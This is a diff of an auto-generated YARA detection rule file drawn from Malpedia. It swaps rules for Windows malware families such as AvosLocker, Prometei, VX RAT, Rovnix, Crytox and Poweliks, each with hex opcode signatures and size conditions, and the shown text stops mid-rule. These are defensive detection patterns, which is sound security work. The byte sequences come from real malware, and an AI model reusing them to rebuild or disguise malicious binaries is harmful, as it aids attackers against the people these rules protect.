-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sepsys_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avos_locker_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "50eb49ac3d5f5dfe611a451c1ec48caa70453cd380c122b00dd8d016e6744ba5"
+		logic_hash = "25a4044828a799f02250311dfaed2866f19c9739199bc4c05e8d323abbd8f547"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142334,32 +142133,32 @@ rule MALPEDIA_Win_Sepsys_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8b542430 488b4c2470 e8???????? 668944243c 0fb744243c 83f805 }
-		$sequence_1 = { e8???????? 4889842490000000 e9???????? 488b8424e8000000 4889842458010000 488b8424f0000000 4889842460010000 }
-		$sequence_2 = { 49f7d0 4d01e0 4883e003 7424 31c9 0f1f840000000000 8d140f }
-		$sequence_3 = { e8???????? 488955b8 488945b0 eb00 c6450700 4889e0 488b4db8 }
-		$sequence_4 = { 8b5511 8b5d14 895518 895d1b c6460802 8b11 8b4903 }
-		$sequence_5 = { 8b1488 448b85f4050000 488d8518040000 488985500a0000 488b8d500a0000 89957c010000 44898578010000 }
-		$sequence_6 = { e8???????? eb00 488d8d80000000 488d95a0000000 e8???????? eb00 8b8580000000 }
-		$sequence_7 = { e9???????? 4c8d4c243f 4c8d44243c 488b942450020000 488b842450020000 488b4810 e8???????? }
-		$sequence_8 = { e9???????? 807c243400 4c8b6c2440 0f8437020000 4889f9 4889f2 e8???????? }
-		$sequence_9 = { d3e0 488b4c2448 8b4c8c50 0bc8 8bc1 89442444 8b442420 }
+		$sequence_0 = { 8d8d80fbffff e8???????? 888595fbffff 6a20 8d8d80fbffff e8???????? 888596fbffff }
+		$sequence_1 = { 83fe1a 7ce4 eb0c 57 8d44241c 50 ff15???????? }
+		$sequence_2 = { c7462800000000 c7462c00000000 0f114618 c645c000 f30f7e45d0 660fd64628 c745d000000000 }
+		$sequence_3 = { 64a300000000 8bf1 8975ec c745fc00000000 6a24 c745f000000000 e8???????? }
+		$sequence_4 = { 8955ec 3bda 7467 8b4208 8b4b08 8b730c }
+		$sequence_5 = { 8d46ec 6a00 50 ff15???????? 85c0 0f8506080000 8b4604 }
+		$sequence_6 = { 50 e8???????? 83c40c 6b45e430 8945e0 8d8090f74b00 8945e4 }
+		$sequence_7 = { 66890451 33c0 6689445102 59 c20400 ff742408 c644240400 }
+		$sequence_8 = { 8bcc 89a54cf7ffff 68???????? e8???????? c645fc35 8d85b8f9ffff 50 }
+		$sequence_9 = { 8b11 8d4201 8901 8a442413 8802 0fb6c0 eb0b }
 
 	condition:
-		7 of them and filesize < 4538368
+		7 of them and filesize < 1701888
 }
-rule MALPEDIA_Win_Sdbbot_Auto : FILE
+rule MALPEDIA_Win_Prometei_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e5ddf82d-6516-5715-9fa8-b1a6bdbb883d"
+		id = "62ace16c-b0c3-554c-a9f7-6209373c3e72"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sdbbot_auto.yar#L1-L180"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.prometei_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "a7c9bbefe17c51ab7bd282fe70d8133f645f1f7f65d3be7e33bd1c26f76ee007"
+		logic_hash = "9dde111159215a62fc6cb6707e61b66d4977093dee25c22cb9e592670f784bca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142373,39 +142172,38 @@ rule MALPEDIA_Win_Sdbbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03f3 8b17 03d3 33c9 8a02 }
-		$sequence_1 = { 8b5df0 8bbb80000000 03fe 897dec 833f00 0f847d000000 }
-		$sequence_2 = { 2b7b34 8955ec 85d2 0f84ae000000 8b83a0000000 03c6 }
-		$sequence_3 = { 56 57 c745e400000000 895df4 895de0 }
-		$sequence_4 = { 8945fc 85c0 0f84c2010000 0f1f840000000000 8b7028 33c9 }
-		$sequence_5 = { 8b5b10 8b433c 8b441878 03c3 8945dc 8b7820 }
-		$sequence_6 = { 03c1 8955ec 8945e4 85d2 0f8560ffffff 8b5df0 8b7328 }
-		$sequence_7 = { 7403 4f ebe2 64a130000000 897df8 }
-		$sequence_8 = { c3 803d????????00 750c c605????????01 }
-		$sequence_9 = { 664503de 4983c004 4983c102 664585db 75ac 4c8bb42480000000 }
-		$sequence_10 = { 41bb01000000 48897c2438 4c89ac2488000000 488b4818 4c8b7920 }
-		$sequence_11 = { 41b9ffff0000 458d6b03 66660f1f840000000000 498b5750 33c0 450fb74748 }
-		$sequence_12 = { 48ffc2 8801 488d4901 4983e801 }
-		$sequence_13 = { 7446 4d03cf 0f1f840000000000 418b49f8 49ffca 418b11 4903ce }
-		$sequence_14 = { 418b11 4903ce 458b41fc 4903d5 4d85c0 7419 0f1f8000000000 }
-		$sequence_15 = { 488bf0 4885c0 7474 8b7d10 8b5d00 4903fe }
-		$sequence_16 = { 0f84a7000000 0f1f840000000000 8b4304 85c0 }
+		$sequence_0 = { 011d???????? 03c8 8b5de4 a1???????? }
+		$sequence_1 = { 5b 8d7db0 8907 8bc7 bf1f000000 897004 894808 }
+		$sequence_2 = { 33c0 85ff 742c 8b75d8 03f2 0fbe5405b8 }
+		$sequence_3 = { 014368 81434400020000 c7434000000000 83534800 }
+		$sequence_4 = { 014358 8b45f0 01435c 8b45fc }
+		$sequence_5 = { ff15???????? 0fbe05???????? 56 8945fc ff15???????? }
+		$sequence_6 = { b801000000 f745c000020000 8bd1 0f44f8 }
+		$sequence_7 = { 833d????????00 0f85cc000000 6a00 6880000000 6a03 6a00 6a00 }
+		$sequence_8 = { 10d0 00bb2d784334 2cbb 8d3b 61 }
+		$sequence_9 = { f5 b56b 55 48 2d63d3c0b9 25809d1976 0482 }
+		$sequence_10 = { 013d???????? 8b04b5c8054400 0500080000 3bc8 }
+		$sequence_11 = { 01435c 8b45fc 014360 8b45f4 }
+		$sequence_12 = { e8???????? 44 b46b d6 1e }
+		$sequence_13 = { 014364 8b45e4 014368 5b }
+		$sequence_14 = { 014360 8b45f4 014364 8b45e4 }
+		$sequence_15 = { 014354 8b45e8 014358 8b45f0 }
 
 	condition:
-		7 of them and filesize < 1015808
+		7 of them and filesize < 51014656
 }
-rule MALPEDIA_Win_Laziok_Auto : FILE
+rule MALPEDIA_Win_Deeppost_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "79b2ce92-e42d-5fec-a687-7e4fbea19571"
+		id = "26540ba9-fd06-58b9-819a-14fd842afc11"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.laziok_auto.yar#L1-L101"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deeppost"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deeppost_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "621f5999fd77cd3089a05c94f9c8d680d38cd15a4fe64826e89765eb3b0323fd"
+		logic_hash = "728aa018aa6f90f3b8f03324b5446d97f2579b8aa528bcd211ab4ccdadb166ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142419,30 +142217,32 @@ rule MALPEDIA_Win_Laziok_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 751a ff7610 ff15???????? 56 }
-		$sequence_1 = { 59 85c0 740a 8b4c240c 8b742408 8901 }
-		$sequence_2 = { 8bc6 5e c20800 55 8bec 81ec04010000 }
-		$sequence_3 = { 668945f0 8b4604 8945f4 0fb74608 }
-		$sequence_4 = { ff74240c 33f6 ff35???????? e8???????? }
-		$sequence_5 = { 668945f2 8b460c 85c0 7404 8b00 eb03 }
-		$sequence_6 = { 7513 6a00 ff7510 ff750c ff7608 ff15???????? eb3f }
-		$sequence_7 = { e8???????? 59 59 85c0 740d 3bc7 }
+		$sequence_0 = { ff7640 e8???????? 83c410 8b4e3c 85c9 740e 8b06 }
+		$sequence_1 = { e8???????? 83c40c 85c0 7440 6a06 68???????? 56 }
+		$sequence_2 = { c1e708 0bca 0bf8 8b03 f780b800000000080000 7509 }
+		$sequence_3 = { 8bc3 c1e810 8bd6 0fb6c0 c1c208 0fb688589a4800 8bc3 }
+		$sequence_4 = { 8d85f0feffff 8bd7 53 ff7518 8bce 50 ff7510 }
+		$sequence_5 = { 8bd3 e8???????? 85c0 0f85ce000000 8d8694000000 8d8f94000000 8945fc }
+		$sequence_6 = { e8???????? 83c40c 837e1410 8b4d0c 894e10 720f 8b06 }
+		$sequence_7 = { e8???????? 83c408 85c0 0f84b4000000 6a00 c7404c805d4000 e8???????? }
+		$sequence_8 = { e8???????? 83c40c 8d0cb500000000 51 8b4dfc ff7108 ff7708 }
+		$sequence_9 = { e8???????? 83c404 85c0 0f8533080000 b901000000 894dfc e9???????? }
 
 	condition:
-		7 of them and filesize < 688128
+		7 of them and filesize < 1332224
 }
-rule MALPEDIA_Win_Silentgh0St_Auto : FILE
+rule MALPEDIA_Win_Vx_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "291abef6-9e33-5a8d-8adc-76e9209f6497"
+		id = "819f769e-28ec-57e1-97b7-877072140604"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silentgh0st"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.silentgh0st_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vx_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vx_rat_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "9a04c7809c217e9efeaf55825390ec7954a79ff3371a97034dc7cf6c87eca139"
+		logic_hash = "97c6bacd6a4877ccea5be5ba5b0fe3c6e6fc6df11d41b5e80278399e84bfb336"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142456,32 +142256,32 @@ rule MALPEDIA_Win_Silentgh0St_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c9 c3 8b45fc ff7018 ff750c e8???????? 59 }
-		$sequence_1 = { 33c4 89842488000000 8b8424a0000000 8b8c2494000000 53 8b9c24a0000000 55 }
-		$sequence_2 = { e8???????? 8bcf 85c0 7507 e8???????? ebb0 6834020000 }
-		$sequence_3 = { 33c9 83e701 894c2418 897c2414 a900000004 0f8596000000 c744241801030000 }
-		$sequence_4 = { 8bc6 c1f805 8bfe 53 8d1c8500c40e10 8b03 83e71f }
-		$sequence_5 = { 8d04454c950e10 8bc8 2bce 6a03 d1f9 68???????? 2bd9 }
-		$sequence_6 = { 83c420 e9???????? 8b96bc000000 8b8290000000 3bc5 7514 6a0a }
-		$sequence_7 = { 8d85f8feffff 6a5c 50 e8???????? 59 59 3bc3 }
-		$sequence_8 = { 8b4a10 03c0 80e108 03c0 0fb6d1 83c404 03c0 }
-		$sequence_9 = { 8d8304010000 8bd6 2bd0 b910000000 89542420 eb04 8b542420 }
+		$sequence_0 = { 8d45f4 64a300000000 8bf1 8b1d???????? c70600000000 c7461400000000 85db }
+		$sequence_1 = { 8b0d???????? 8bd3 ff7608 6a32 50 }
+		$sequence_2 = { e9???????? d9ee 84cd 0f84d2ae0000 d9e0 e9???????? ddd8 }
+		$sequence_3 = { a1???????? 833c0700 7518 6a28 e8???????? 8b0d???????? 83c404 }
+		$sequence_4 = { 8b45b8 03c0 c78540fdffff07000000 6889000000 }
+		$sequence_5 = { 8bca c1f906 83e23f 6bd238 8b0c8d10df4300 88441129 }
+		$sequence_6 = { 8b048510df4300 f644082801 7406 8b440818 5d }
+		$sequence_7 = { 8b4ddc 8b45e8 8b0c8d10df4300 f644082804 7416 8a45ec }
+		$sequence_8 = { 55 8bec 8b4510 56 8b750c 8b0e 3b0c8514e24300 }
+		$sequence_9 = { 68e0070000 57 e8???????? ffb5d8f7ffff eb0c 68e0070000 }
 
 	condition:
-		7 of them and filesize < 2065408
+		7 of them and filesize < 550912
 }
-rule MALPEDIA_Win_Nagini_Auto : FILE
+rule MALPEDIA_Win_Rovnix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96b62be7-f485-5281-9063-fa2aa017f19b"
+		id = "32481422-18fb-556e-8e6c-7773a418af62"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nagini_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rovnix_auto.yar#L1-L329"
 		license_url = "N/A"
-		logic_hash = "7611b927095df92b3b5eaffee00806b1be3b736d512ae6422738ca1d97180738"
+		logic_hash = "ba6bf6a0e452ea16caba209e420afba03e6b6e5de61f66132ac7c6a92113c249"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -142495,32 +142295,58 @@ rule MALPEDIA_Win_Nagini_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 080c08 07 0d0807110c 0916 100b }
-		$sequence_1 = { 83781408 7202 8b00 50 e8???????? 83c404 837c245808 }
-		$sequence_2 = { 0f835ffbffff 03f3 03d3 83fb1f 0f8715040000 ff249da0c64000 8b46e4 }
-		$sequence_3 = { 0404 0406 0404 06 0404 06 0404 }
-		$sequence_4 = { 0536240538 27 06 37 260537260535 230434 2203 }
-		$sequence_5 = { 07 0505080606 0907 07 }
-		$sequence_6 = { 6a14 8d0440 3d860a0000 756c 6a32 68a0000000 }
-		$sequence_7 = { 6454 48 68584c6959 4d 6f 5f 53 }
-		$sequence_8 = { 06 0806 06 0907 }
-		$sequence_9 = { 89441928 8b45f0 8954192c 8b4df4 8b148dc0914200 }
+		$sequence_0 = { 83c335 c1e902 ad 2bc3 }
+		$sequence_1 = { 57 6a00 ffd2 89442408 8bcf }
+		$sequence_2 = { ad 2bc3 ab e2fa 61 }
+		$sequence_3 = { 837c242c00 7405 57 6a00 }
+		$sequence_4 = { 8b15???????? 83e7f0 89542418 83c710 8bea }
+		$sequence_5 = { 60 bf40090000 be???????? 8b15???????? }
+		$sequence_6 = { 8b4d0c 897604 8936 8d7e08 }
+		$sequence_7 = { 8b7e10 eb06 8b5d0c 8b7d08 8bcf }
+		$sequence_8 = { 8bc2 c1e802 25ff000000 8d4cc324 8b01 }
+		$sequence_9 = { 85c0 e8???????? 8be5 5d }
+		$sequence_10 = { 25ff000000 8d4cc624 8b01 3bc1 }
+		$sequence_11 = { 3bc1 75f3 395e14 7511 ff4e18 }
+		$sequence_12 = { 894804 8b4608 8b4e0c 8901 894804 8b4718 }
+		$sequence_13 = { 894f04 8939 897804 ff4308 }
+		$sequence_14 = { 8975e4 c745ec40020000 8975e8 8975f0 }
+		$sequence_15 = { 83f919 7703 83c220 85c0 7404 }
+		$sequence_16 = { e8???????? 8be5 5d c3 85c0 e8???????? }
+		$sequence_17 = { 5d c3 85c9 e8???????? }
+		$sequence_18 = { 55 8bec 85db 85c9 }
+		$sequence_19 = { 23c9 16 85c9 23d2 }
+		$sequence_20 = { 23db 81e1ff000000 23c9 83440c0404 }
+		$sequence_21 = { 89442408 8bcf bb1092c63b 8bf8 83c335 c1e902 }
+		$sequence_22 = { 57 4883ec20 488b35???????? 33c9 bb9a0000c0 e8???????? 33ed }
+		$sequence_23 = { aa 27 ff44a8d2 4b }
+		$sequence_24 = { e8???????? 483bf3 75ea 4883c310 4983ec01 75db 8a5508 }
+		$sequence_25 = { 85c9 23c0 8be5 5d c20800 159e9dc35a fa }
+		$sequence_26 = { 488d8c2400010000 ba00001080 895c2428 897c2420 ff15???????? 85c0 7914 }
+		$sequence_27 = { 488905???????? 4a8d0c10 eb0d 488b02 488905???????? 488b0a 488b05???????? }
+		$sequence_28 = { 6232 27 0149bc 2ec9 }
+		$sequence_29 = { 8bec 23db 16 23c9 59 }
+		$sequence_30 = { d147f0 79f4 28f8 8fc1 }
+		$sequence_31 = { ae d7 b81fe9f60b e8???????? 7660 b85c8e6189 }
+		$sequence_32 = { 488b4128 4883c120 488905???????? 48890d???????? 4c8918 4c895908 33c0 }
+		$sequence_33 = { 488bcf ff15???????? 4c8d5c2470 8bc3 498b5b30 498b6b38 498b7348 }
+		$sequence_34 = { 83440c0404 23c9 8be5 5d c20400 95 367a3e }
+		$sequence_35 = { 4c397500 741e 837d04ff 750f 837d00ff 7512 488b4308 }
 
 	condition:
-		7 of them and filesize < 12820480
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Shujin_Auto : FILE
+rule MALPEDIA_Win_Crytox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "20008e73-1b75-5617-9f42-c7c9bccd7072"
+		id = "b9e5c6f9-e0d6-531a-8dd0-a7fad4a513e9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shujin_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crytox_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "498da53687cd17478c7025106c84cdcc0e6118bdb951cd75112ef2c2e9026da6"
+		logic_hash = "79e78c490080a0e53c534d80effb4ddfe05889d0a54f29415d47f44d77b2adb2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142534,32 +142360,32 @@ rule MALPEDIA_Win_Shujin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff35???????? 8f442404 68dd5d08ae 60 ff3424 }
-		$sequence_1 = { 56 68???????? 53 53 ff15???????? 8984bdfcfeffff 47 }
-		$sequence_2 = { 660fa3ff f8 3529af0800 9c c7858cfcffffcccccccc 9c f8 }
-		$sequence_3 = { 6814050000 53 68???????? e8???????? 83c40c 891d???????? }
-		$sequence_4 = { 8b742410 57 6a08 5f 8b4cfe50 }
-		$sequence_5 = { c1ea02 8a92506c4000 8811 83e003 c1e004 8bd6 c1ea04 }
-		$sequence_6 = { 8bda 23d8 0fb69be8a54000 33fb 8b5d08 337b04 8b5d0c }
-		$sequence_7 = { c0f305 f9 6a04 87ce 9c 0fbec9 660face902 }
-		$sequence_8 = { 885c2404 887c2404 8d642410 e8???????? 9c 668b3424 }
-		$sequence_9 = { 8d45ec 50 68000f0050 8d8e74040000 57 e8???????? 6a05 }
+		$sequence_0 = { e9???????? 81fb07100000 0f84fcfcffff e9???????? 81fb0c000200 0f86ebfcffff e9???????? }
+		$sequence_1 = { f72424 897c2414 8b7c2404 69cf182d0700 89c6 b867fb0900 01ca }
+		$sequence_2 = { e8???????? 8945c8 8b45c8 c1f809 89c2 8b45cc c1f809 }
+		$sequence_3 = { e8???????? 395c2430 75e5 8b7c2460 8b442434 31d2 8b5c2430 }
+		$sequence_4 = { c705????????a9bc6600 e9???????? e8???????? 0fb6c0 8983d0470000 8b03 e8???????? }
+		$sequence_5 = { e8???????? 8b4c2418 894104 8b4104 8938 8b4104 c7400400000000 }
+		$sequence_6 = { e8???????? 31c0 eb17 891c24 e8???????? 837d0c00 89f0 }
+		$sequence_7 = { e8???????? 89442404 8b55d8 8b4208 890424 e8???????? 83f80f }
+		$sequence_8 = { e9???????? c744240477bf6600 891c24 e8???????? 85c0 750f c705????????05000000 }
+		$sequence_9 = { e8???????? e9???????? 807b0300 0f84a7000000 a1????????85c07533 e8???????? 480f8eff010000 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 6156288
 }
-rule MALPEDIA_Win_Sys10_Auto : FILE
+rule MALPEDIA_Win_Phoreal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f6b87c71-e5a8-51b9-bf42-5ce35b9897c0"
+		id = "2e1897fd-9f9a-538a-af8f-a84b5fcbe486"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sys10_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phoreal_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "34aa3f50a631ab8b6462b3454dab9cbf3c83a5ccbafc56348e488e070debe8a8"
+		logic_hash = "18c8ae88c86b0c778613b0a4c96093868db37bfa76fd9a20dc86ddc9f37cec17"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142573,32 +142399,32 @@ rule MALPEDIA_Win_Sys10_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ffd7 8b4b08 51 }
-		$sequence_1 = { 7511 6810270000 ff15???????? 33c0 }
-		$sequence_2 = { ffd3 6a00 6a00 6a00 6a00 8bf8 }
-		$sequence_3 = { 7407 53 ff15???????? 8b06 50 }
-		$sequence_4 = { 53 52 e8???????? 83c42c 85c0 }
-		$sequence_5 = { ffd7 8b4304 50 ffd7 8b4b08 51 }
-		$sequence_6 = { 52 ffd7 8b4308 50 }
-		$sequence_7 = { 57 8d542438 53 52 e8???????? }
-		$sequence_8 = { 6a00 897c2434 894c242c 89742438 }
-		$sequence_9 = { 52 6a05 50 ffd6 8b5308 }
+		$sequence_0 = { 33ff 8d642400 8b4608 3b7e0c 731f 8b0cb8 8d04b8 }
+		$sequence_1 = { 8bd0 0355f8 83c40c 2bf7 740b 8bce 33c0 }
+		$sequence_2 = { 8d45ac 50 51 53 ffd6 85c0 750a }
+		$sequence_3 = { 2bf0 03f8 85f6 7fe0 eb03 83cfff }
+		$sequence_4 = { 2bc1 50 51 8d45cc 50 53 }
+		$sequence_5 = { 51 c7852cfeffff01000000 888534feffff e8???????? 8d8554ffffff 33d2 8d7e17 }
+		$sequence_6 = { 1bd2 f7d2 85d1 75c3 8b5c2414 33ff 8b4c2418 }
+		$sequence_7 = { 8b0d???????? 8b55fc 8d040f 2bf0 03f1 c1fe02 }
+		$sequence_8 = { c78574ffffff8992f2a7 c78578ffffffaa9e9aee c7857cffffff89a5c199 c7458067cc6aaf c74584fa1200f5 c74588efc8d4ba }
+		$sequence_9 = { 85ff 7414 8b855cffffff 50 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 622592
 }
-rule MALPEDIA_Win_Hlux_Auto : FILE
+rule MALPEDIA_Win_Unidentified_095_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4c2052b-0cd7-527b-912e-2b962734b611"
+		id = "ae500f5e-affa-5f35-9b25-bf3d8d6f6e24"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hlux_auto.yar#L1-L158"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_095_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "779cc27c2a832f57ff4dea76d2b777f85d6a15f93d14c3ef1d8885e9224660be"
+		logic_hash = "67701e8a3738389ac39b70a15648c44474c2440f2bd29cec3f0c8b5d1f7550a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142612,38 +142438,32 @@ rule MALPEDIA_Win_Hlux_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7406 899d44ffffff 09c9 7506 898d9cfeffff 83ffd6 }
-		$sequence_1 = { 7503 895598 8b9decfeffff 8d0b 09db }
-		$sequence_2 = { 0009 1b4e01 e405 9d }
-		$sequence_3 = { 0088aa4b0023 d18a0688078a 46 018847018a46 }
-		$sequence_4 = { 0000 008365f0fe8b 4d 0883c108e918 }
-		$sequence_5 = { 0130 8b13 8b08 85d2 }
-		$sequence_6 = { 33db 81f926edf50a 742f 8d144b 8d8c8b9948a5f2 8955f0 83f909 }
-		$sequence_7 = { 7534 85c9 7430 83f9f4 }
-		$sequence_8 = { bba43c0cdb 8b15???????? 8955c4 895de0 83f8c1 7503 8945d8 }
-		$sequence_9 = { 010f 840f 0000 008365f0fe8b }
-		$sequence_10 = { 0104bb 8d1447 89542418 e9???????? }
-		$sequence_11 = { 0101 c9 c3 6a10 }
-		$sequence_12 = { 0104b9 33c9 83c408 85c0 }
-		$sequence_13 = { 898d84feffff 8b0d???????? 8b1d???????? 899d0cffffff }
-		$sequence_14 = { 83f8a6 7406 89851cffffff 8b1d???????? 895df4 8b3d???????? }
-		$sequence_15 = { 89bd64ffffff 09c0 750b 83f8c1 7406 }
+		$sequence_0 = { 4c8d0590ea0000 488d1541dd0000 e8???????? 4885c0 740f 488bcb 4883c420 }
+		$sequence_1 = { 488d15f0e80100 488d0df5e80100 e8???????? eb2e 803875 }
+		$sequence_2 = { 7419 4c8d442420 ba01000000 488bcb ff15???????? 85c0 }
+		$sequence_3 = { 4d3bc1 0f84d1000000 8b7500 498b9cf7b8410200 90 4885db 740b }
+		$sequence_4 = { 498bcc 488b9424c0000000 48896c2460 48896c2458 48896c2450 48896c2448 4889442440 }
+		$sequence_5 = { 752e 48895c2430 448d4303 895c2428 488d0d67a00000 4533c9 4489442420 }
+		$sequence_6 = { 4157 4881ec68020000 488b05???????? 4833c4 4889842440020000 49896b18 }
+		$sequence_7 = { 4883c308 488d0520990100 483bd8 75d8 b001 4883c420 }
+		$sequence_8 = { ff15???????? 3d24040000 7523 eb1c 41c70601000000 4885ed 7410 }
+		$sequence_9 = { e9???????? 488d05b7890100 4a8b0ce8 42385cf938 }
 
 	condition:
-		7 of them and filesize < 3147776
+		7 of them and filesize < 339968
 }
-rule MALPEDIA_Win_Lyposit_Auto : FILE
+rule MALPEDIA_Win_Poweliks_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c947693c-fdb4-5804-b039-d3be391d589e"
+		id = "f451c0b0-4649-5c08-94b0-36c17c318bbf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lyposit_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poweliks_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "1aae27919b7142f3a956ce5a03df97f5716bf7d507962564bd1a349d0184cbbf"
+		logic_hash = "67c4fd9796059c69286d2c247dc5cb104b6a720e1f7ef3b5b45dfcea3566e76a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142657,32 +142477,32 @@ rule MALPEDIA_Win_Lyposit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? e8???????? 8b5d10 8365fc00 6a1c 6a40 ff15???????? }
-		$sequence_1 = { 53 ff15???????? 85c0 742a 6aff ff75c0 ff15???????? }
-		$sequence_2 = { 83c410 85c0 7424 8b4ddc 8a01 3c31 7504 }
-		$sequence_3 = { 8b0f e8???????? 59 59 0337 }
